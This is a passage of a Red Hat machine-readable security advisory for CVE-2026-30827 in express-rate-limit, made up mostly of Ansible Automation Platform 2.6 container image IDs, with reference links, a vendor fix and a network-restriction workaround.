"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-30827"
},
{
"category": "external",
"summary": "RHBZ#2445429",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445429"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-30827",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-30827"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-30827",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30827"
},
{
"category": "external",
"summary": "https://github.com/express-rate-limit/express-rate-limit/commit/14e53888cdfd1b9798faf5b634c4206409e27fc4",
"url": "https://github.com/express-rate-limit/express-rate-limit/commit/14e53888cdfd1b9798faf5b634c4206409e27fc4"
},
{
"category": "external",
"summary": "https://github.com/express-rate-limit/express-rate-limit/security/advisories/GHSA-46wh-pxpv-q5gq",
"url": "https://github.com/express-rate-limit/express-rate-limit/security/advisories/GHSA-46wh-pxpv-q5gq"
}
],
"release_date": "2026-03-07T05:19:08.206000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T23:31:56+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6309"
},
{
"category": "workaround",
"details": "Restrict network access to applications utilizing the express-rate-limit middleware to trusted clients or networks. Implementing firewall rules or network access controls can prevent untrusted actors from exploiting the shared rate-limit bucket vulnerability affecting IPv4-mapped IPv6 addresses on dual-stack servers.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
